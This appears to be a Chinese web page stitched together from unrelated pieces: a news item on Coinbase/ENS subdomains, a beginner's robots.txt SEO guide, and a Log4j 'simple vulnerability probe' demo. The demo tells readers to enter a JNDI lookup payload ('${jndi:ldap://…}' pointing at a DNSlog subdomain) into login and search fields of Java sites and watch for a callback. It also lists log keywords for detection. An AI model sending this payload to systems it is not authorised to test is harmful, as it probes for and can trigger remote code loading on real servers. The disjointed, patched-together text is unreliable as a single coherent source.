子域名是什么漏洞简易探测演示：

8月23日消息

8月23日消息，Coinbase与ENS合作上线去中心化身份功能，能够生成并向符合条件的用户提供免费的子域名。用户可通过Coinbase Wallet领取基于ENS的“cb.id”子域名，从而获得去中心化身份并访问Web3服务。

盘点那些有关Robots实战经验

盘点那些有关Robots实战经验，小白速看！


robots协议简介
在网站优化中，robots协议是优化人员需要重视的细节，或许还不知Robots是什么。robots协议是一个搜索引擎的国际默认公约，通常用于网络搜索引擎的漫游器（又称网络蜘蛛），此网站中哪些内容是不应被搜索引擎漫游器获取的，哪些是可以被漫游器获取的。所以任何网站只要在其robots中禁止搜索引擎访问，那么搜索引擎就无权收录。例如：用户在网站上产生的内容势必会有能够带来商业价值的数据，同时也涉及到用户隐私，所以网站必须保护好用户隐私，不能将数据轻易交付给第三方。此时，robots的重要性就体现出来了,网站可以设置禁止网络爬虫爬取用户隐私的robots。
下面，就让我们来了解一下robots协议吧！
Robots文件的作用
robots文件是一个放置在域名（或子域名）根目录下、文件名固定为robots.txt（全部小写）、UTF8编码、纯ASCII的文本文件，用来通知搜索引擎，网站的哪些部分可以抓取，哪些禁止抓取robots.txt只对所在域名（或子域名）、协议和端口号起作用。
搜索引擎蜘蛛在抓取网站页面前，会先看一下robots.txt的内容，哪些页面可以抓取，哪些页面被站长禁止抓取。当然，是否遵守robots文件规则就靠自觉，某些坏蜘蛛就不遵守，站长是没办法的，比如采集内容、克隆网站的。
所以，robots.txt文件是站长禁止搜索引擎抓取某些页面的指令。但是注意，页面没有被抓取，不意味着页面就不会被索引和收录，这是两个概念。
怎样写Robots文件
robots协议简介：Robots文件每行记录均由一个字段、一个冒号和一个值组成，标准格式是：
:<#ment>
其中指可以加一个空格，但不是必须，通常建议加这个空格，比较容易读
<#ment>是另一个可选项，用于写些注释
通常robots文件中的记录通常以User-agent开始，后面加上若干Disallow和Allow行。User-agent指定本记录用于哪个搜索引擎蜘蛛，Disallow是指定禁止抓取的文件或目录，Allow是指定允许抓取的文件或记录。
所有搜索引擎都支持的robots文件记录包括： 
Disallow 告诉蜘蛛不要抓取某些文件或目录。如下面代码将阻止所有蜘蛛抓取所有的网站文件：
    User-agent: *
    Disallow: /
Allow  告诉蜘蛛应该抓取某些文件。Allow和Disallow配合使用，可以告诉蜘蛛某个目录下，大部分都不抓取，只抓取一部分。如下面代码将使蜘蛛不抓取qg目录下其他文件，而只抓取其中cd下的文件：
    User-agent: *
    Disallow: /qg/
    Allow: /ag/cd
$通配符 匹配URL结尾的字符。如下面代码将允许蜘蛛访问以.htm为后缀的URL：
    User-agent: *
    Allow: .htm$
*通配符 告诉蜘蛛匹配任意一段字符。如下面一段代码将禁止所有蜘蛛抓取所有htm文件：
    User-agent: *
    Disallow: /*.htm
Sitemaps位置 告诉蜘蛛你的网站地图在哪里，格式为：
    Sitemap:

一、Robots文件的注意事项
另外提醒大家注意的是，robots.txt文件可以不存在，返回404错误，意味着允许蜘蛛抓取所有内容。但抓取robots.txt文件时却发生超时之类的错误，可能导致搜索引擎不收录网站，因为蜘蛛不知道robots.txt文件是否存在或者里面有什么内容，这与确认文件不存在是不一样的。
另外，如果robots.txt文件不存在，而404页面上包含一些URL，可能会造成搜索引擎误将404页面的内容当作robots文件的内容，导致无法预测的后果。所以，即使想开放所有搜索引擎蜘蛛抓取所有内容，也最好放一个robots文件，哪怕是空的文件。
Robots文件的检测
写好robots文件后如果不确定是否写得正确，可以用Robots.txt检测工具验证一下：如->
枫树SEO网的Robots.txt检测工具
打开枫树SEO网（网页链接）
点击站长工具

再点击Robots检测工具

或输入网址
网页链接
输入网址后，验证工具会告诉你的网站robots文件写得怎么样，URL是否允许被抓取和都禁止了哪些蜘蛛爬取和禁止爬取了哪些目录
如图所示：

掌握robots文件用法和写法是SEO的基本功.遇到页面不被收录或收录骤降，robots文件也是第一个

漏洞简易探测演示：

漏洞简易探测演示：
第一步，访问 ，点击“GetSubDomain”按钮，获取你的临时专有子域名，用于获得DNSlog回显：
如
第二步，根据该子域名构建一个JNDI字符串：
如${jndi:ldap://网页链接}
第三步，访问你们自个儿公司包括内网各种有可能应用了log4j的Java站点，在登录页面的输入框中尝试上述JNDI字符串，或者登录之后在各种查询输入框中尝试，如图一所示。
第四步，回到刚才的 ，点击“Refresh Record”，会发现多了一条DNS回显记录，如图二所示。
大家可以用同样的方法对你的Java站点做一下测试。如果没有该漏洞，则就不会有DNSlog回显记录。
多说一句，其原理在于：
『
1.攻击者在利用漏洞之前通常采用dnslog方式进行扫描、探测，常见的漏洞利用方式可通过应用系统报错日志中的"javax.naming.CommunicationException&34;javax.naming.NamingException: problem generating object using object factory&34;Error looking up JNDI resource"关键字进行排查。

2.攻击者发送的数据包中可能存在&34; 字样，推荐大家使用WAF进行检索排查。』